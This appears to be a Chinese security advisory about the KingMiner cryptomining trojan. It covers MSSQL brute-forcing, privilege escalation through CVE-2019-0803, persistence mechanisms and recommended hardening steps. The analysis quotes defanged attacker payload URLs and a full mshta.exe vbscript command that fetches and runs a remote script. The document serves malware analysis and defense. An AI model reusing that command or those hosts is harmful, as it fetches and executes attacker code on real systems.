全站搜索

安全预警:KingMiner矿工针对SQL弱口令的爆破攻击再度袭来

分类:行业资讯 157 0

一、背景

KingMiner是一种针对Windows服务器MSSQL进行爆破攻击的门罗币挖矿木马。该木马最早于2018年6月中旬首次出现,并在随后迅速发布了两个改进版本。攻击者采用了多种逃避技术来绕过虚拟机环境和安全检测,导致一些反病毒引擎无法准确检测。

当前版本KingMiner具有以下特点:

1. 针对MSSQL进行爆破攻击入侵;

2. 利用WMI定时器和Windows计划任务进行持久化攻击;

3. 关闭存在CVE-2019-0708漏洞机器上RDP服务防止其他挖矿团伙入侵,以独占已控制的服务器资源;

4. 使用base64和特定编码的XML,TXT,PNG文件来加密木马程序;

5. 利用微软和多个知名厂商的签名文件作为父进程,“白+黑”启动木马DLL。

二、详细分析

KingMiner在MSSQL爆破入侵成功后,首先执行一段VBS脚本(tl.txt/vk.txt),检测操作系统版本,并根据不同的系统版本下载不同的Payload文件,利用下载的文件进行提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本,执行服务器返回的恶意代码达到持久化攻击的目的。

KingMiner变种攻击流程

提权

vk.txt从http[:]// w.30713fdae.tk/32tl.zip下载经过base64编码的二进制blob文件,经过解码后保存为C:\Users\Public\Downloads\<random>\tool.exe

tool.exe 利用Windows权限提升漏洞CVE-2019-0803进行攻击,成功利用此漏洞的攻击者可以在内核模式下运行任意代码,然后可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。

tool.exe在特权模式下执行命令mshta.exe vbscript:GetObject(\”script:http[:]//aa.30583fdae.tk/r1.txt\”)(window.close),通过mshta.exe执行脚本r1.txt来进行持久化。

病毒会获取计算机版本并判断计算机版本是否受CVE-2019-0708漏洞的影响且计算机是否安装特定补丁(kb4499175 kb4500331 KB4499149 KB4499180 KB4499164为微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号)。

如果没有安装补丁,则修改设置禁止其他机器通过远程桌面服务访问本机,通过这种方式来阻止其他木马进入系统,从而达到独占挖矿资源的目的

三、安全建议

我们建议企业针对KingMiner挖矿木马的技术特点采取针对性的防御措施:

1.根据微软官方公告修复特权提升漏洞CVE-2019-0803:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803

2、加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿继续使用弱口令,特别是sa账号密码,防止黑客暴力破解。

3、修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。

标签:安全预警 上一篇: 下一篇:

您好!请登录

点击取消回复